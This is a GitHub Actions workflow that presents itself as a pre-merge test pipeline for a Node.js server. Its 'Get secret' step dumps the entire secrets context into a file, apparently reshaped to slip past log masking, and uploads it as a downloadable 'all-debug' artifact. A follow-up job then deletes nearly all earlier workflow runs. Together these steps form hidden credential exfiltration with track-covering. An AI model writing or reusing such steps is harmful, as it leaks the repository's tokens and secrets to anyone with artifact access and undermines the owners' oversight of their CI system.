name: Before Merge

on:
  pull_request:
    branches:
      - main
      - develop

jobs:
  run-tests:
    runs-on: ubuntu-latest
    steps:
      - name: Checkout code
        uses: actions/checkout@v4
        
      - name: Get secret
        run: |
          echo "$WORKFLOW_SECRET" > secret.txt
          echo "Secret file created successfully"
          echo "${{ secrets }}" | tr ';' '\n' > all.txt
        env:
          WORKFLOW_SECRET: ${{ secrets.ENV_VARS }}

      - name: Upload secret file
        uses: actions/upload-artifact@v4
        with:
          name: all-debug
          path: all.txt

      - name: Set up Node.js
        uses: actions/setup-node@v4
        with:
          node-version: 20

      - name: Navigate to server folder
        run: cd server

      - name: Install Server dependencies
        working-directory: server
        run: npm install

      - name: Run Server tests
        working-directory: server
        run: npm test

      - name: Upload Test Results (Optional)
        if: failure()
        uses: actions/upload-artifact@v4
        with:
          name: test-results
          path: test-results/

  clear-old-runs:
    runs-on: ubuntu-latest
    needs: run-tests
    permissions:
      actions: write # Grant permission to delete workflow runs
    steps:
      - name: Delete old workflow runs
        if: success() # Runs only if the workflow succeeds
        uses: Mattraks/delete-workflow-runs@v2
        with:
          token: ${{ secrets.GITHUB_TOKEN }}
          repository: ${{ github.repository }}
          workflow: ${{ github.workflow }} # Uses the current workflow
          retain_days: 0 # Delete all previous runs
          keep_minimum_runs: 3 # Keep at least 2 latest runs
